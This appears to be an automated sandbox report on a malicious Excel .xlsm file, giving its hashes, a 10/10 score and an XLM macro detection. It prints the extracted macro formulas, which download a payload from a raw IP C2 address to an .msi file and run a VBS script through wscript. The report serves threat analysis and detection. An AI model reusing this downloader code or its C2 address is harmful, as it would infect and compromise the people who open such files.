General

  • Target

    ad1cd20cdf48ccb42ddefd3c3a0033b9

  • Size

    6KB

  • MD5

    ad1cd20cdf48ccb42ddefd3c3a0033b9

  • SHA1

    a5c11e16614a6d206d76fb3b068f2a5128b3fd9c

  • SHA256

    497c758891df758b6b57ed619904acc433ec0a12353faf1162e1ba92cf46ed90

  • SHA512

    84b090f0e571f3db92caa949854ba39b0ee0659cefa5682800bf006cb2f03c0328913f8beda936ef36f4fed14d794c2d29a675f496d7f56fc8d22a62103dde9b

  • SSDEEP

    192:NDSMuSCbrA2OmmfR58UhHFBFYunb98yV8+N:NjuDM2w/1FY+b98yVP

Score
10/10
xlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://46.17.98.187/index.php

http://google.com/index.php

Attributes
  • formulas

    =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()

Signatures

Files

  • ad1cd20cdf48ccb42ddefd3c3a0033b9
    .xlsm office2007